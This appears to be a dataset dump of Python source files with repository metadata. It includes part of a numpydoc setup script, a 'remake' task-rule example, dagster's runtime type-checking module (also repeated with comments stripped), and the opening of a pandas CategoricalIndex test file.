url="http://projects.scipy.org/numpy/browser/trunk/doc/sphinxext",
license="BSD",
zip_safe=False,
install_requires=["Sphinx >= 0.5"],
package_data={'numpydoc': 'tests', '': ''},
entry_points={
"console_scripts": [
"autosummary_generate = numpydoc.autosummary_generate:main",
],
},
)
| true | true |
f73289685bd37aa689ba66d97e917694c4fc2fa7 | 1,147 | py | Python | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | 35 | 2020-12-22T11:36:46.000Z | 2021-12-03T15:49:41.000Z | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | """Demonstrates partial run when some input data not there.
"""
from remake import Remake, TaskRule
ex8 = Remake()
class CannotRun(TaskRule):
rule_inputs = {'in1': 'data/inputs/input_not_there.txt'}
rule_outputs = {'out': 'data/inputs/ex8_in1.txt'}
def rule_run(self):
input_text = self.inputs['in1'].read_text()
self.outputs['out'].write_text(input_text + '\n')
class CanRun1(TaskRule):
rule_inputs = CannotRun.rule_outputs
rule_outputs = {'out1': 'data/outputs/ex8/out1.txt',
'out2': 'data/outputs/ex8/out2.txt'}
def rule_run(self):
for o in self.outputs.values():
o.write_text('out')
class CanRun2(TaskRule):
rule_inputs = {'in': 'data/outputs/ex8/out{i}.txt'}
rule_outputs = {'out1': 'data/outputs/ex8/out2.{i}.txt'}
var_matrix = {'i': [1, 2]}
def rule_run(self):
assert len(self.inputs) == len(self.outputs)
for i, o in zip(self.inputs.values(), self.outputs.values()):
o.write_text('\n'.join([f'f1 {line}' for line in i.read_text().split('\n')[:-1]]) + '\n')
if __name__ == '__main__':
ex8.finalize()
| 28.675 | 101 | 0.617262 | from remake import Remake, TaskRule
ex8 = Remake()
class CannotRun(TaskRule):
rule_inputs = {'in1': 'data/inputs/input_not_there.txt'}
rule_outputs = {'out': 'data/inputs/ex8_in1.txt'}
def rule_run(self):
input_text = self.inputs['in1'].read_text()
self.outputs['out'].write_text(input_text + '\n')
class CanRun1(TaskRule):
rule_inputs = CannotRun.rule_outputs
rule_outputs = {'out1': 'data/outputs/ex8/out1.txt',
'out2': 'data/outputs/ex8/out2.txt'}
def rule_run(self):
for o in self.outputs.values():
o.write_text('out')
class CanRun2(TaskRule):
rule_inputs = {'in': 'data/outputs/ex8/out{i}.txt'}
rule_outputs = {'out1': 'data/outputs/ex8/out2.{i}.txt'}
var_matrix = {'i': [1, 2]}
def rule_run(self):
assert len(self.inputs) == len(self.outputs)
for i, o in zip(self.inputs.values(), self.outputs.values()):
o.write_text('\n'.join([f'f1 {line}' for line in i.read_text().split('\n')[:-1]]) + '\n')
if __name__ == '__main__':
ex8.finalize()
| true | true |
f73289beadbbd779b42062ae2dd20756a3a1975e | 18,377 | py | Python | python_modules/dagster/dagster/core/types/runtime.py | cclauss/dagster | 6494edbfd52526812aadf941bf90edf3ade1d912 | [
"Apache-2.0"
] | 1 | 2019-07-15T17:34:04.000Z | 2019-07-15T17:34:04.000Z | python_modules/dagster/dagster/core/types/runtime.py | stevencasey/dagster | 1881f67f55725c40432dbc1ed99b8cfbd9629600 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/core/types/runtime.py | stevencasey/dagster | 1881f67f55725c40432dbc1ed99b8cfbd9629600 | [
"Apache-2.0"
] | null | null | null | from functools import partial
import six
from dagster import check
from dagster.core.storage.type_storage import TypeStoragePlugin
from .builtin_enum import BuiltinEnum
from .builtin_config_schemas import BuiltinSchemas
from .config import ConfigType
from .config import List as ConfigList
from .config import Nullable as ConfigNullable
from .config_schema import InputHydrationConfig, OutputMaterializationConfig
from .marshal import SerializationStrategy, PickleSerializationStrategy
from .dagster_type import check_dagster_type_param
from .wrapping import WrappingListType, WrappingNullableType
def check_opt_config_cls_param(config_cls, param_name):
if config_cls is None:
return config_cls
check.invariant(isinstance(config_cls, type))
check.param_invariant(issubclass(config_cls, ConfigType), param_name)
return config_cls
class RuntimeType(object):
'''
The class backing DagsterTypes as they are used during execution.
'''
def __init__(
self,
key,
name,
is_builtin=False,
description=None,
input_hydration_config=None,
output_materialization_config=None,
serialization_strategy=None,
auto_plugins=None,
):
type_obj = type(self)
if type_obj in RuntimeType.__cache:
check.failed(
(
'{type_obj} already in cache. You **must** use the inst() class method '
'to construct RuntimeType and not the ctor'.format(type_obj=type_obj)
)
)
self.key = check.str_param(key, 'key')
self.name = check.opt_str_param(name, 'name')
self.description = check.opt_str_param(description, 'description')
self.input_hydration_config = check.opt_inst_param(
input_hydration_config, 'input_hydration_config', InputHydrationConfig
)
self.output_materialization_config = check.opt_inst_param(
output_materialization_config,
'output_materialization_config',
OutputMaterializationConfig,
)
self.serialization_strategy = check.opt_inst_param(
serialization_strategy,
'serialization_strategy',
SerializationStrategy,
PickleSerializationStrategy(),
)
auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
check.param_invariant(
all(
issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins
),
'auto_plugins',
)
self.auto_plugins = auto_plugins
self.is_builtin = check.bool_param(is_builtin, 'is_builtin')
__cache = {}
@classmethod
def inst(cls):
if cls not in RuntimeType.__cache:
RuntimeType.__cache[cls] = cls() # pylint: disable=E1120
return RuntimeType.__cache[cls]
@staticmethod
def from_builtin_enum(builtin_enum):
check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum')
return _RUNTIME_MAP[builtin_enum]
@property
def display_name(self):
return self.name
def type_check(self, value):
pass
@property
def is_any(self):
return False
@property
def is_scalar(self):
return False
@property
def is_list(self):
return False
@property
def is_nullable(self):
return False
@property
def inner_types(self):
return []
@property
def is_nothing(self):
return False
class BuiltinScalarRuntimeType(RuntimeType):
def __init__(self, *args, **kwargs):
name = type(self).__name__
super(BuiltinScalarRuntimeType, self).__init__(
key=name, name=name, is_builtin=True, *args, **kwargs
)
@property
def is_scalar(self):
return True
class Int(BuiltinScalarRuntimeType):
def __init__(self):
super(Int, self).__init__(
input_hydration_config=BuiltinSchemas.INT_INPUT,
output_materialization_config=BuiltinSchemas.INT_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, six.integer_types):
raise Failure(_typemismatch_error_str(value, 'int'))
def _typemismatch_error_str(value, expected_type_desc):
return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format(
value=value, python_type=type(value).__name__, type_desc=expected_type_desc
)
def _throw_if_not_string(value):
from dagster.core.definitions.events import Failure
if not isinstance(value, six.string_types):
raise Failure(_typemismatch_error_str(value, 'string'))
class String(BuiltinScalarRuntimeType):
def __init__(self):
super(String, self).__init__(
input_hydration_config=BuiltinSchemas.STRING_INPUT,
output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
)
def type_check(self, value):
_throw_if_not_string(value)
class Path(BuiltinScalarRuntimeType):
def __init__(self):
super(Path, self).__init__(
input_hydration_config=BuiltinSchemas.PATH_INPUT,
output_materialization_config=BuiltinSchemas.PATH_OUTPUT,
)
def type_check(self, value):
_throw_if_not_string(value)
class Float(BuiltinScalarRuntimeType):
def __init__(self):
super(Float, self).__init__(
input_hydration_config=BuiltinSchemas.FLOAT_INPUT,
output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, float):
raise Failure(_typemismatch_error_str(value, 'float'))
class Bool(BuiltinScalarRuntimeType):
def __init__(self):
super(Bool, self).__init__(
input_hydration_config=BuiltinSchemas.BOOL_INPUT,
output_materialization_config=BuiltinSchemas.BOOL_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, bool):
raise Failure(_typemismatch_error_str(value, 'bool'))
class Anyish(RuntimeType):
def __init__(
self,
key,
name,
input_hydration_config=None,
output_materialization_config=None,
is_builtin=False,
description=None,
):
super(Anyish, self).__init__(
key=key,
name=name,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
is_builtin=is_builtin,
description=description,
)
@property
def is_any(self):
return True
class Any(Anyish):
def __init__(self):
super(Any, self).__init__(
key='Any',
name='Any',
input_hydration_config=BuiltinSchemas.ANY_INPUT,
output_materialization_config=BuiltinSchemas.ANY_OUTPUT,
is_builtin=True,
)
def define_any_type(name, description=None):
class NamedAnyType(Anyish):
def __init__(self):
super(NamedAnyType, self).__init__(key=name, name=name, description=description)
return NamedAnyType
class Nothing(RuntimeType):
def __init__(self):
super(Nothing, self).__init__(
key='Nothing',
name='Nothing',
input_hydration_config=None,
output_materialization_config=None,
is_builtin=True,
)
@property
def is_nothing(self):
return True
def type_check(self, value):
from dagster.core.definitions.events import Failure
if value is not None:
raise Failure('Value {value} must be None.')
class PythonObjectType(RuntimeType):
def __init__(self, python_type, key=None, name=None, typecheck_metadata_fn=None, **kwargs):
name = check.opt_str_param(name, 'name', type(self).__name__)
key = check.opt_str_param(key, 'key', name)
super(PythonObjectType, self).__init__(key=key, name=name, **kwargs)
self.python_type = check.type_param(python_type, 'python_type')
self.typecheck_metadata_fn = check.opt_callable_param(
typecheck_metadata_fn, 'typecheck_metadata_fn'
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, self.python_type):
raise Failure(
'Value {value} should be of type {type_name}.'.format(
value=value, type_name=self.python_type.__name__
)
)
if self.typecheck_metadata_fn:
return self.typecheck_metadata_fn(value)
def define_python_dagster_type(
python_type,
name=None,
description=None,
input_hydration_config=None,
output_materialization_config=None,
serialization_strategy=None,
auto_plugins=None,
typecheck_metadata_fn=None,
):
'''
The dagster typesystem is very flexible, and the body of a typecheck can be
a function that does *anything*. (For that level of flexiblity one should inherit
from RuntimeType directly) However its very common to want to generate a dagster
type whose only typecheck is against a python type:
DateTime = define_python_dagster_type(datetime.datetime, name='DateTime')
Args:
python_type (cls)
The python type you want check against.
name (Optional[str]):
Name of the dagster type. Defaults to the name of the python_type.
description (Optiona[str]):
input_hydration_config (Optional[InputHydrationConfig]):
An instance of a class that inherits from :py:class:`InputHydrationConfig` that
can map config data to a value of this type.
output_materialization_config (Optiona[OutputMaterializationConfig]):
An instance of a class that inherits from :py:class:`OutputMaterializationConfig` that
can map config data to persisting values of this type.
serialization_strategy (Optional[SerializationStrategy]):
The default behavior for how to serialize this value for persisting between execution
steps.
auto_plugins (Optional[List[type]]):
types *must* subclass from TypeStoragePlugin.
This allows for types to specify serialization that depends on what storage
is being used to serialize intermediates. In these cases the serialization_strategy
is not sufficient because serialization requires specialized API calls, e.g.
to call an s3 API directly instead of using a generic file object. See
dagster_pyspark.DataFrame for an example of auto_plugins.
typecheck_metadata_fn (Callable):
It is used to emit metadata when you successfully check a type. This allows
the user specifiy that function that emits that metadata object whenever the typecheck
succeeds. The passed in function takes the value being evaluated and returns a
TypeCheck event.
See dagster_pandas.DataFrame for an example
'''
check.type_param(python_type, 'python_type')
check.opt_str_param(name, 'name')
check.opt_str_param(description, 'description')
check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig)
check.opt_inst_param(
output_materialization_config, 'output_materialization_config', OutputMaterializationConfig
)
check.opt_inst_param(
serialization_strategy,
'serialization_strategy',
SerializationStrategy,
default=PickleSerializationStrategy(),
)
auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
check.param_invariant(
all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins),
'auto_plugins',
)
check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn')
class _ObjectType(PythonObjectType):
def __init__(self):
super(_ObjectType, self).__init__(
python_type=python_type,
name=name,
description=description,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
serialization_strategy=serialization_strategy,
auto_plugins=auto_plugins,
typecheck_metadata_fn=typecheck_metadata_fn,
)
return _ObjectType
def _create_nullable_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst()
class _NullableSchema(InputHydrationConfig):
@property
def schema_type(self):
return nullable_type
def construct_from_config_value(self, context, config_value):
if config_value is None:
return None
return inner_type.input_hydration_config.construct_from_config_value(
context, config_value
)
return _NullableSchema()
class NullableType(RuntimeType):
def __init__(self, inner_type):
key = 'Optional.' + inner_type.key
super(NullableType, self).__init__(
key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return self.inner_type.display_name + '?'
def type_check(self, value):
return None if value is None else self.inner_type.type_check(value)
@property
def is_nullable(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def _create_list_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst()
class _ListSchema(InputHydrationConfig):
@property
def schema_type(self):
return list_type
def construct_from_config_value(self, context, config_value):
convert_item = partial(
inner_type.input_hydration_config.construct_from_config_value, context
)
return list(map(convert_item, config_value))
return _ListSchema()
class ListType(RuntimeType):
def __init__(self, inner_type):
key = 'List.' + inner_type.key
super(ListType, self).__init__(
key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return '[' + self.inner_type.display_name + ']'
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, list):
raise Failure('Value must be a list, got {value}'.format(value=value))
for item in value:
self.inner_type.type_check(item)
@property
def is_list(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def Optional(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _Nullable(NullableType):
def __init__(self):
super(_Nullable, self).__init__(inner_type)
return _Nullable.inst()
def List(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _List(ListType):
def __init__(self):
super(_List, self).__init__(inner_type)
return _List.inst()
class Stringish(RuntimeType):
def __init__(self, key=None, name=None, **kwargs):
name = check.opt_str_param(name, 'name', type(self).__name__)
key = check.opt_str_param(key, 'key', name)
super(Stringish, self).__init__(key=key, name=name, **kwargs)
def is_scalar(self):
return True
def type_check(self, value):
return _throw_if_not_string(value)
_RUNTIME_MAP = {
BuiltinEnum.ANY: Any.inst(),
BuiltinEnum.BOOL: Bool.inst(),
BuiltinEnum.FLOAT: Float.inst(),
BuiltinEnum.INT: Int.inst(),
BuiltinEnum.PATH: Path.inst(),
BuiltinEnum.STRING: String.inst(),
BuiltinEnum.NOTHING: Nothing.inst(),
}
def resolve_to_runtime_type(dagster_type):
# circular dep
from .decorator import is_runtime_type_decorated_klass, get_runtime_type_on_decorated_klass
from .mapping import remap_python_type
dagster_type = remap_python_type(dagster_type)
check_dagster_type_param(dagster_type, 'dagster_type', RuntimeType)
if dagster_type is None:
return Any.inst()
if BuiltinEnum.contains(dagster_type):
return RuntimeType.from_builtin_enum(dagster_type)
if isinstance(dagster_type, WrappingListType):
return resolve_to_runtime_list(dagster_type)
if isinstance(dagster_type, WrappingNullableType):
return resolve_to_runtime_nullable(dagster_type)
if is_runtime_type_decorated_klass(dagster_type):
return get_runtime_type_on_decorated_klass(dagster_type)
if issubclass(dagster_type, RuntimeType):
return dagster_type.inst()
check.failed('should not reach')
def resolve_to_runtime_list(list_type):
check.inst_param(list_type, 'list_type', WrappingListType)
return List(resolve_to_runtime_type(list_type.inner_type))
def resolve_to_runtime_nullable(nullable_type):
check.inst_param(nullable_type, 'nullable_type', WrappingNullableType)
return Optional(resolve_to_runtime_type(nullable_type.inner_type))
ALL_RUNTIME_BUILTINS = set(_RUNTIME_MAP.values())
def construct_runtime_type_dictionary(solid_defs):
type_dict = {t.name: t for t in ALL_RUNTIME_BUILTINS}
for solid_def in solid_defs:
for runtime_type in solid_def.all_runtime_types():
type_dict[runtime_type.name] = runtime_type
return type_dict
| 31.467466 | 100 | 0.681885 | from functools import partial
import six
from dagster import check
from dagster.core.storage.type_storage import TypeStoragePlugin
from .builtin_enum import BuiltinEnum
from .builtin_config_schemas import BuiltinSchemas
from .config import ConfigType
from .config import List as ConfigList
from .config import Nullable as ConfigNullable
from .config_schema import InputHydrationConfig, OutputMaterializationConfig
from .marshal import SerializationStrategy, PickleSerializationStrategy
from .dagster_type import check_dagster_type_param
from .wrapping import WrappingListType, WrappingNullableType
def check_opt_config_cls_param(config_cls, param_name):
if config_cls is None:
return config_cls
check.invariant(isinstance(config_cls, type))
check.param_invariant(issubclass(config_cls, ConfigType), param_name)
return config_cls
class RuntimeType(object):
def __init__(
self,
key,
name,
is_builtin=False,
description=None,
input_hydration_config=None,
output_materialization_config=None,
serialization_strategy=None,
auto_plugins=None,
):
type_obj = type(self)
if type_obj in RuntimeType.__cache:
check.failed(
(
'{type_obj} already in cache. You **must** use the inst() class method '
'to construct RuntimeType and not the ctor'.format(type_obj=type_obj)
)
)
self.key = check.str_param(key, 'key')
self.name = check.opt_str_param(name, 'name')
self.description = check.opt_str_param(description, 'description')
self.input_hydration_config = check.opt_inst_param(
input_hydration_config, 'input_hydration_config', InputHydrationConfig
)
self.output_materialization_config = check.opt_inst_param(
output_materialization_config,
'output_materialization_config',
OutputMaterializationConfig,
)
self.serialization_strategy = check.opt_inst_param(
serialization_strategy,
'serialization_strategy',
SerializationStrategy,
PickleSerializationStrategy(),
)
auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
check.param_invariant(
all(
issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins
),
'auto_plugins',
)
self.auto_plugins = auto_plugins
self.is_builtin = check.bool_param(is_builtin, 'is_builtin')
__cache = {}
@classmethod
def inst(cls):
if cls not in RuntimeType.__cache:
RuntimeType.__cache[cls] = cls()
return RuntimeType.__cache[cls]
@staticmethod
def from_builtin_enum(builtin_enum):
check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum')
return _RUNTIME_MAP[builtin_enum]
@property
def display_name(self):
return self.name
def type_check(self, value):
pass
@property
def is_any(self):
return False
@property
def is_scalar(self):
return False
@property
def is_list(self):
return False
@property
def is_nullable(self):
return False
@property
def inner_types(self):
return []
@property
def is_nothing(self):
return False
class BuiltinScalarRuntimeType(RuntimeType):
def __init__(self, *args, **kwargs):
name = type(self).__name__
super(BuiltinScalarRuntimeType, self).__init__(
key=name, name=name, is_builtin=True, *args, **kwargs
)
@property
def is_scalar(self):
return True
class Int(BuiltinScalarRuntimeType):
def __init__(self):
super(Int, self).__init__(
input_hydration_config=BuiltinSchemas.INT_INPUT,
output_materialization_config=BuiltinSchemas.INT_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, six.integer_types):
raise Failure(_typemismatch_error_str(value, 'int'))
def _typemismatch_error_str(value, expected_type_desc):
return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format(
value=value, python_type=type(value).__name__, type_desc=expected_type_desc
)
def _throw_if_not_string(value):
from dagster.core.definitions.events import Failure
if not isinstance(value, six.string_types):
raise Failure(_typemismatch_error_str(value, 'string'))
class String(BuiltinScalarRuntimeType):
def __init__(self):
super(String, self).__init__(
input_hydration_config=BuiltinSchemas.STRING_INPUT,
output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
)
def type_check(self, value):
_throw_if_not_string(value)
class Path(BuiltinScalarRuntimeType):
def __init__(self):
super(Path, self).__init__(
input_hydration_config=BuiltinSchemas.PATH_INPUT,
output_materialization_config=BuiltinSchemas.PATH_OUTPUT,
)
def type_check(self, value):
_throw_if_not_string(value)
class Float(BuiltinScalarRuntimeType):
def __init__(self):
super(Float, self).__init__(
input_hydration_config=BuiltinSchemas.FLOAT_INPUT,
output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, float):
raise Failure(_typemismatch_error_str(value, 'float'))
class Bool(BuiltinScalarRuntimeType):
def __init__(self):
super(Bool, self).__init__(
input_hydration_config=BuiltinSchemas.BOOL_INPUT,
output_materialization_config=BuiltinSchemas.BOOL_OUTPUT,
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, bool):
raise Failure(_typemismatch_error_str(value, 'bool'))
class Anyish(RuntimeType):
def __init__(
self,
key,
name,
input_hydration_config=None,
output_materialization_config=None,
is_builtin=False,
description=None,
):
super(Anyish, self).__init__(
key=key,
name=name,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
is_builtin=is_builtin,
description=description,
)
@property
def is_any(self):
return True
class Any(Anyish):
def __init__(self):
super(Any, self).__init__(
key='Any',
name='Any',
input_hydration_config=BuiltinSchemas.ANY_INPUT,
output_materialization_config=BuiltinSchemas.ANY_OUTPUT,
is_builtin=True,
)
def define_any_type(name, description=None):
class NamedAnyType(Anyish):
def __init__(self):
super(NamedAnyType, self).__init__(key=name, name=name, description=description)
return NamedAnyType
class Nothing(RuntimeType):
def __init__(self):
super(Nothing, self).__init__(
key='Nothing',
name='Nothing',
input_hydration_config=None,
output_materialization_config=None,
is_builtin=True,
)
@property
def is_nothing(self):
return True
def type_check(self, value):
from dagster.core.definitions.events import Failure
if value is not None:
raise Failure('Value {value} must be None.')
class PythonObjectType(RuntimeType):
def __init__(self, python_type, key=None, name=None, typecheck_metadata_fn=None, **kwargs):
name = check.opt_str_param(name, 'name', type(self).__name__)
key = check.opt_str_param(key, 'key', name)
super(PythonObjectType, self).__init__(key=key, name=name, **kwargs)
self.python_type = check.type_param(python_type, 'python_type')
self.typecheck_metadata_fn = check.opt_callable_param(
typecheck_metadata_fn, 'typecheck_metadata_fn'
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, self.python_type):
raise Failure(
'Value {value} should be of type {type_name}.'.format(
value=value, type_name=self.python_type.__name__
)
)
if self.typecheck_metadata_fn:
return self.typecheck_metadata_fn(value)
def define_python_dagster_type(
python_type,
name=None,
description=None,
input_hydration_config=None,
output_materialization_config=None,
serialization_strategy=None,
auto_plugins=None,
typecheck_metadata_fn=None,
):
check.type_param(python_type, 'python_type')
check.opt_str_param(name, 'name')
check.opt_str_param(description, 'description')
check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig)
check.opt_inst_param(
output_materialization_config, 'output_materialization_config', OutputMaterializationConfig
)
check.opt_inst_param(
serialization_strategy,
'serialization_strategy',
SerializationStrategy,
default=PickleSerializationStrategy(),
)
auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
check.param_invariant(
all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins),
'auto_plugins',
)
check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn')
class _ObjectType(PythonObjectType):
def __init__(self):
super(_ObjectType, self).__init__(
python_type=python_type,
name=name,
description=description,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
serialization_strategy=serialization_strategy,
auto_plugins=auto_plugins,
typecheck_metadata_fn=typecheck_metadata_fn,
)
return _ObjectType
def _create_nullable_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst()
class _NullableSchema(InputHydrationConfig):
@property
def schema_type(self):
return nullable_type
def construct_from_config_value(self, context, config_value):
if config_value is None:
return None
return inner_type.input_hydration_config.construct_from_config_value(
context, config_value
)
return _NullableSchema()
class NullableType(RuntimeType):
def __init__(self, inner_type):
key = 'Optional.' + inner_type.key
super(NullableType, self).__init__(
key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return self.inner_type.display_name + '?'
def type_check(self, value):
return None if value is None else self.inner_type.type_check(value)
@property
def is_nullable(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def _create_list_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst()
class _ListSchema(InputHydrationConfig):
@property
def schema_type(self):
return list_type
def construct_from_config_value(self, context, config_value):
convert_item = partial(
inner_type.input_hydration_config.construct_from_config_value, context
)
return list(map(convert_item, config_value))
return _ListSchema()
class ListType(RuntimeType):
def __init__(self, inner_type):
key = 'List.' + inner_type.key
super(ListType, self).__init__(
key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return '[' + self.inner_type.display_name + ']'
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, list):
raise Failure('Value must be a list, got {value}'.format(value=value))
for item in value:
self.inner_type.type_check(item)
@property
def is_list(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def Optional(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _Nullable(NullableType):
def __init__(self):
super(_Nullable, self).__init__(inner_type)
return _Nullable.inst()
def List(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _List(ListType):
def __init__(self):
super(_List, self).__init__(inner_type)
return _List.inst()
class Stringish(RuntimeType):
def __init__(self, key=None, name=None, **kwargs):
name = check.opt_str_param(name, 'name', type(self).__name__)
key = check.opt_str_param(key, 'key', name)
super(Stringish, self).__init__(key=key, name=name, **kwargs)
def is_scalar(self):
return True
def type_check(self, value):
return _throw_if_not_string(value)
_RUNTIME_MAP = {
BuiltinEnum.ANY: Any.inst(),
BuiltinEnum.BOOL: Bool.inst(),
BuiltinEnum.FLOAT: Float.inst(),
BuiltinEnum.INT: Int.inst(),
BuiltinEnum.PATH: Path.inst(),
BuiltinEnum.STRING: String.inst(),
BuiltinEnum.NOTHING: Nothing.inst(),
}
def resolve_to_runtime_type(dagster_type):
from .decorator import is_runtime_type_decorated_klass, get_runtime_type_on_decorated_klass
from .mapping import remap_python_type
dagster_type = remap_python_type(dagster_type)
check_dagster_type_param(dagster_type, 'dagster_type', RuntimeType)
if dagster_type is None:
return Any.inst()
if BuiltinEnum.contains(dagster_type):
return RuntimeType.from_builtin_enum(dagster_type)
if isinstance(dagster_type, WrappingListType):
return resolve_to_runtime_list(dagster_type)
if isinstance(dagster_type, WrappingNullableType):
return resolve_to_runtime_nullable(dagster_type)
if is_runtime_type_decorated_klass(dagster_type):
return get_runtime_type_on_decorated_klass(dagster_type)
if issubclass(dagster_type, RuntimeType):
return dagster_type.inst()
check.failed('should not reach')
def resolve_to_runtime_list(list_type):
check.inst_param(list_type, 'list_type', WrappingListType)
return List(resolve_to_runtime_type(list_type.inner_type))
def resolve_to_runtime_nullable(nullable_type):
check.inst_param(nullable_type, 'nullable_type', WrappingNullableType)
return Optional(resolve_to_runtime_type(nullable_type.inner_type))
ALL_RUNTIME_BUILTINS = set(_RUNTIME_MAP.values())
def construct_runtime_type_dictionary(solid_defs):
type_dict = {t.name: t for t in ALL_RUNTIME_BUILTINS}
for solid_def in solid_defs:
for runtime_type in solid_def.all_runtime_types():
type_dict[runtime_type.name] = runtime_type
return type_dict
| true | true |
f7328a99195b9c2f34557772f93a23c78d7e72a9 | 43,541 | py | Python | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | 1 | 2019-03-31T13:46:57.000Z | 2019-03-31T13:46:57.000Z | # -*- coding: utf-8 -*-
import pytest
import pandas.util.testing as tm
from pandas.core.indexes.api import Index, CategoricalIndex
from pandas.core.dtypes.dtypes import CategoricalDtype
from .common import Base
from pandas.compat import range, PY3
import numpy as np
from pandas import Categorical, IntervalIndex, compat
from pandas.util.testing import assert_almost_equal
import pandas.core.config as cf
import pandas as pd
if PY3:
unicode = lambda x: x
class TestCategoricalIndex(Base):
_holder = CategoricalIndex
def setup_method(self, method):
self.indices = dict(catIndex=tm.makeCategoricalIndex(100))
self.setup_indices()
def create_index(self, categories=None, ordered=False):
if categories is None:
categories = list('cab')
return CategoricalIndex(
list('aabbca'), categories=categories, ordered=ordered)
def test_construction(self):
ci = self.create_index(categories=list('abcd'))
categories = ci.categories
result = Index(ci)
tm.assert_index_equal(result, ci, exact=True)
assert not result.ordered
result = Index(ci.values)
tm.assert_index_equal(result, ci, exact=True)
assert not result.ordered
# empty
result = CategoricalIndex(categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes, np.array([], dtype='int8'))
assert not result.ordered
# passing categories
result = CategoricalIndex(list('aabbca'), categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
c = pd.Categorical(list('aabbca'))
result = CategoricalIndex(c)
tm.assert_index_equal(result.categories, Index(list('abc')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(c, categories=categories)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
ci = CategoricalIndex(c, categories=list('abcd'))
result = CategoricalIndex(ci)
tm.assert_index_equal(result.categories, Index(categories))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, 2, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(ci, categories=list('ab'))
